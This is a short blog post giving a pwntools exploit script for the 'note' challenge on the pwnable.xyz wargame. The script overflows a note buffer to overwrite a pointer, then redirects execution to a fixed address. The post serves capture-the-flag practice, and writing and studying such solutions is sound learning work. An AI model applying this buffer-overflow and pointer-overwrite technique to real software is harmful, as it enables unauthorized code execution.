Pwning in Linux

Exploit - Note pwnable.xyz

theFaunia in the wild 2019. 3. 1. 01:15

Exploit

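from pwn import *

context.log_level = 'debug'

# Remote challenge service; switch to the process() line to run a local copy.
p = remote("svc.pwnable.xyz", 30016)
#p = process('./note')

# Optional: attach gdb to the local process with a breakpoint.
#gdb.attach(p,'''
#break *0x0000000000400a10
#continue
#''')

# Menu option 1: edit the note.
p.recvuntil(b"> ")
p.sendline(b"1")

p.recvuntil(b"Note len? ")
p.sendline(b"38")

# 32 filler bytes followed by the address 0x601220 packed as 4 little-endian bytes.
p.recvuntil(b"note: ")
payload = b"A" * 32 + p32(0x601220)
p.sendline(payload)

# Menu option 2: edit the desc; send 0x40093c as an 8-byte little-endian value.
p.recvuntil(b"> ")
p.sendline(b"2")
p.recvuntil(b"desc: ")
p.sendline(p64(0x40093c))

# Send menu input "12", then read everything the service returns.
p.recvuntil(b"> ")
p.sendline(b"12")

print(p.recvall())
p.close()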
